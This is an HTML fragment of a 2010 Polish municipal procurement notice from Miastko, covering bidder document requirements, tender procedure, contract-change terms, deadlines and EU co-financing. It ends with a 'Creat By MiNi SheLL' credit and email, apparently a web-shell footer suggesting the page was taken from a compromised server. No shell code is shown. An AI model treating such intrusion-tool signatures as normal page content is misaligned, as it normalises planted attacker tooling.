<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) dowód wniesienia wadium: 
a) jeżeli wniesiono w pieniądzu - do oferty zaleca się dołączyć dowód zrealizowania przelewu w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę; 
b) jeżeli wniesiono w innej dopuszczalnej formie - do oferty należy dołączyć oryginał właściwego dokumentu; 
2) pełnomocnictwo osób/y uprawnionej do reprezentowania firmy, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze handlowym lub w innym dokumencie, właściwym dla formy organizacyjnej firmy Wykonawcy o ile nie wynika to z innych dokumentów załączonych do oferty; 
3) dokument, w którym wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. na podstawie umowy konsorcjalnej, działalności prowadzonej w formie spółki cywilnej) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, z którego wynika, że zostało ono udzielone przez każdego z Nich (podpisany przez wszystkich wykonawców) - w formie oryginału, w przypadku wyboru oferty tych Wykonawców, Zamawiający przed zawarciem umowy ws. zamówienia publicznego będzie żądał umowę regulującą ich współpracę; 
4) wskazanie części zamówienia, której wykonanie Wykonawca zamierza powierzyć Podwykonawcom;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) zmiany osób sprawujących czynności i wskazanych w ofercie na uzasadniony wniosek wykonawcy zaakceptowany przez Zamawiającego lub na żądanie Zamawiającego jeżeli nie wywiązują się one z nałożonych obowiązków; 
2) przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest: 
a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności; 
b) uzyskania zgody Instytucji Zarządzającej na przedłużenie terminu realizacji projektu z przyczyn obecnie niemożliwych do określenia, 
c) wykopaliskami uniemożliwiającymi wykonywanie robót; 
d) szczególnie niesprzyjającymi warunkami atmosferycznymi; 
e) koniecznością dokonania istotnych zmian w dokumentacji projektowej na wniosek stron; 
f) wystąpieniem siły wyższej;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Miastku, ul. Grunwaldzka 1, 77-200 Miastko p. nr 17. Płatność 10,00 PLN (brutto) - dotyczy wersji papierowej przekazywanej na wniosek wykonawcy..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2010 godzina 11:00, miejsce: Urząd Miejski w Miastku, ul. Grunwaldzka 1, 77-200 Miastko p. nr 19 ( I piętro - sekretariat burmistrza). Otwarcie ofert nastąpi w dniu 5 marca 2010r. o godz. 11:15 pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie objęte jest dofinansowaniem w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, Osi Priorytetowej 8. Lokalna infrastruktura podstawowa, Działania 8.1 Lokalny potencjał rozwojowy, Poddziałanie 8.1.2 Lokalna infrastruktura wspierająca rozwój gospodarczy, współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego - stosownie do wniosku o dofinansowanie nr WND-RPPM.08.01.02-00-005/09 z dnia 02.04.2009r. i umowy nr UDA-RPPM.08.01.02-00-005/09-00 z dn. 01.12.2009r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com